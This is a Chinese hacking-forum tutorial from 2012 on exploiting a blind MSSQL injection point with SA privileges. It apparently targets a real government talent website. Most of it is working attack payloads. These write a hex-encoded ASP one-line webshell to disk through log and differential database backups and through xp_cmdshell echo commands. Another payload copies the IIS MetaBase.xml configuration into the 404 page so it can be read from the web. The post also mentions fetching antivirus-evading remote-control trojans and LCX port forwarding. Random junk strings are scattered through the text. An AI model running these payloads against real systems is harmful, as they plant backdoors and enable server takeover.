中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]
作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————$ N; n. E' q% K: l) o- o

. N2 I7 H$ l  C3 p
+ D# g: |( j- {$ P! h% u                                                             欢迎高手访问指导,欢迎新手朋友交流学习。# E' v- ?  K& k
* T& S, T9 k7 Q/ P6 Y; C
                                                                 2 ^( m' ^& c8 i8 t: h) @2 X
                                                                 
9 p3 w1 Q+ ?# F2 {8 X; l                                                                  论坛: http://www.90team.net/
, l: N, H2 K# F( N1 {- E% }
" P! a6 b0 {- [( `( F& r! v; H' n2 P
* y- f* o0 k  A0 |6 d7 A5 \
友情检测国家人才网
$ I9 e, o& r' ?7 c
3 d+ B0 @6 C: E, w. T+ ~+ P, U8 z: M" s; ]$ U4 {, ~4 ?# s8 H" n
内容:MSSQL注入SA权限不显错模式下的入侵3 A9 C. D6 r7 n4 L% |; d: o1 _7 R

( ?0 w5 e7 o" E3 [2 j8 Q3 T, J, @; S6 [, [3 U: v! Z
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
0 R8 y; t. X" _9 @; l( P: P" o1 g$ `( |/ L! z# r; x; H4 B
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
( Y9 j" q  P  |4 U) L' t( L# t, ^! X; c1 N" q! b
9 j4 w. b) u# R4 u  P: _* m
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
# z  ~& \. [4 p, H# q. f/ S$ Y
/ ~* I- B7 K* P思路:, u& w8 S. F6 d+ N5 X
$ i) L( d% O0 T, v' M  A* ]: G
首先:
) ^. j& n, e& F8 ^; }" e
+ T! G' P$ A$ X) g. G. A. R通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
; g0 g) R. G+ L  w  x
" ?/ x/ @/ Z' O; s4 ?1.日志备份获得Webshell
1 N$ r/ g% l' D7 r7 Z1 N+ ?, ?
$ k5 @/ M. \* G8 C* J% [" L9 {# r2.数据库差异备份获得Webshell
7 ^, o& v' k7 H& b/ \; x
" W) G) G" `: \+ r4.直接下载免杀远控木马。, }- ?( f8 K* H* P4 b

1 n0 N- k/ G0 y, H2 n& m2 \' c5 P5.直接下载LCX将服务器端口转发出来
2 L, Y1 c0 E, P/ ?6 w; M
! L$ x/ v3 a/ E) T0 r( }& R6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
5 R  t6 A2 k. F- a9 p" ~- g  Y7 w
( r$ @0 i8 w6 v4 ~! L* U% P! q% U

8 S3 U4 Y9 {/ w0 E/ D9 P在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, * b. k  T& `* v% f# o5 c1 X
9 U0 H' y, g6 V& ?( J. c
我直接演示后面一个方法5 O3 ~8 X3 j2 A& _6 p9 U3 M

/ T- H! K5 K4 i" h. c/ p2 T: W2 i5 V% k
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL $ c/ i1 u; r( {( B% i  f

: f1 [3 ^# M/ i5 o; M. |: b0 s' \  J# r6 n
* A: L, o0 z* E+ ]% F5 ?) x" p+ T

5 V% s: b# Y& T# n" l4 R◆日志备份:
' l* w1 ?, ^  c7 M3 b
/ A  J1 D! P6 d1 E$ U  M7 z- ~/ }5 _& e# X5 q
1. 进行初始备份
2 |; q  B8 ?% H4 T; D3 q3 F2 N; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--4 \! |4 X' U  Q- H$ V$ b& N% ]( D

7 Z  a( l5 ^* a- T+ C2. 插入数据
/ [2 p: ^& u; z8 ^" D;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--8 p! I3 W1 p  `3 i
/ I  G' ]  I8 Z$ T1 N3 G0 @" \- ~2 J
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>8 q& F) p! m8 `, [
  ! C( ?- S2 \: N9 v6 v
3. 备份并获得文件,删除临时表
4 ^2 S1 \, _8 S% N3 t;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
) Z" |' e; g2 M* A5 O
; Q$ _$ L: d! V9 ?/ L7 N- }/ h% ]' m: @  ^7 y% l

# Y  |/ |, U, M◆数据库差异备份2 _9 }, Z* o% g3 M# t$ z, {6 W
- d3 i/ N) m( P( B3 {( V' V
(1. 进行差异备份准备工作" Q9 ]9 ?5 n: @: o8 Q+ \/ C
) h/ {$ o0 m7 Q7 P1 A0 U
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--) ]5 L; E, y8 ?# E5 M

0 t( e2 K! c4 E$ f0 c上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码, S% p4 w; a  k: l* \; z1 E
$ z/ n1 B5 C1 V: |: S
1 N) v2 ~% T- `! e/ G  q
(2. 将数据写入到数据库
8 q( e* C2 q4 e: _1 Y, O;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- : ~9 }$ }' E% u: _4 S# O" ^
2 K, o4 F' V# O
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
, T; m2 ]& C( M7 _. m/ b7 M" v! V6 F0 }$ a2 L0 g+ G" H4 J
3. 备份数据库并清理临时文件
! g$ s% p* S" x" {5 l5 O3 ]  h9 c1 Y% X3 o( |5 k
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
  X; f4 @: p7 @4 C# F* b# z1 c# w% A# C1 E
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
+ F  D) `4 l' U2 E1 ~# C, f( j. t7 a( J# j- q' ?3 A4 U

" }+ G1 c5 h! B1 @
: n! H* A6 G) ~: F: h用^转义字符来写ASP(一句话木马)文件的方法:   
0 a& A; t) F  t
( E8 G/ |0 A8 c# ~+ t% e1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--$ S$ p& j- K; m6 v6 l  ?( M* Q9 S
& G' g4 }& J! ?4 G1 |" d2 l
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp $ R  d4 _! n5 k7 m# Z4 o

# E# A4 R4 o: _8 s& }2 {% g3 t读取IIS配置信息获取web路径
5 X7 j9 n4 d1 W1 h4 g) q. F3 o
" X+ s, S* z! C! Y  Z* m5 S     % Z9 I0 c1 d" @& u8 ^) m  @. i
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
. b$ {# Z9 h+ i) k+ p9 t) Z$ _! o0 t* Y# i# L1 c7 L/ T9 d9 t
执行命令2 X' A6 ~+ ^& C2 `. @
     
6 r& ~1 ?& z6 L6 G4 {4 T     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
& ~$ a; M) L) S& t$ u. b: S
! }+ }" s+ n. B* q4 x7 l
" j# l' ^+ b) x; G
4 o5 w; m4 W. e9 q: Z6 q7 T! E3 ^$ Z7 f( j
/ i/ \- P& [7 X" R
7 k" ~2 s) j2 X: I+ n" m
" `2 I. d; k( O- h& y  V
  [* [$ r6 a5 z9 S

5 h: }  H+ b5 X+ x, B) \5 m( z, m4 p
/ Y7 F* p7 |% T( |4 P# P1 t/ F
. `3 o- p: \' b, D9 t% m1 {

7 I1 W6 U4 y$ N5 |2 F; ~5 `6 y. _* R; Z8 J# d  I' G% ?

. S& a! i3 N+ u- ]$ @0 ]; S* D% J6 K7 X4 m  u

; b8 A" l( q" r0 a* w9 i# A6 T/ }" @. \& c0 Z2 D
4 [$ A2 C& ]) T: [5 e/ `5 Q. h
& Z1 }! L5 }/ G' G0 }2 w
% ^! E- D; J7 I. e1 [& R! J5 }

6 q0 Y. D0 X7 n' E; }3 r4 d6 ^2 Y6 |
3 G, O' p9 p7 d+ l; c$ s, Q7 n# d( q$ n9 {" t; q

" Y( k6 N- u4 U7 Q' F9 G
& b* \4 ^/ u* v- ?) Y* N- R/ h0 z, z

, N6 Q$ Q. }# U& d4 {; R7 Q9 I( J
8 e4 ]) X) }: `
. y0 G# [) X8 G- @- H# |6 O# f8 V4 Y0 O5 k
* n0 j. [; O  M( l

5 p& T" n. a5 Y+ v, \6 j& B! W- E6 ~- z0 v; e, x5 U

% W3 B/ g4 H5 K" L9 @4 F
* h3 n- {- g9 k( m) j6 a2 s' |7 s
. w( `; Y7 o5 A
6 M$ R4 t4 h7 ~4 B0 x: D( S4 \4 u$ Q
2 G4 t/ K; t5 }/ c1 w6 d  @$ ^. H5 M

+ [$ }6 F6 g1 C: t& d3 N3 W- E9 D' B, R  k! a

8 t8 v* ~1 I# y# ^. M8 V
% T1 h; j$ X( j5 b$ m/ L8 _4 m7 J; |9 A- ?! W, O6 C

, Z4 ^2 k7 x& _: f+ T- t9 A5 x/ s) d9 H3 D. f9 ^( L8 \5 r( N

# H, g& [9 x, n, }6 \8 C5 d1 F



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2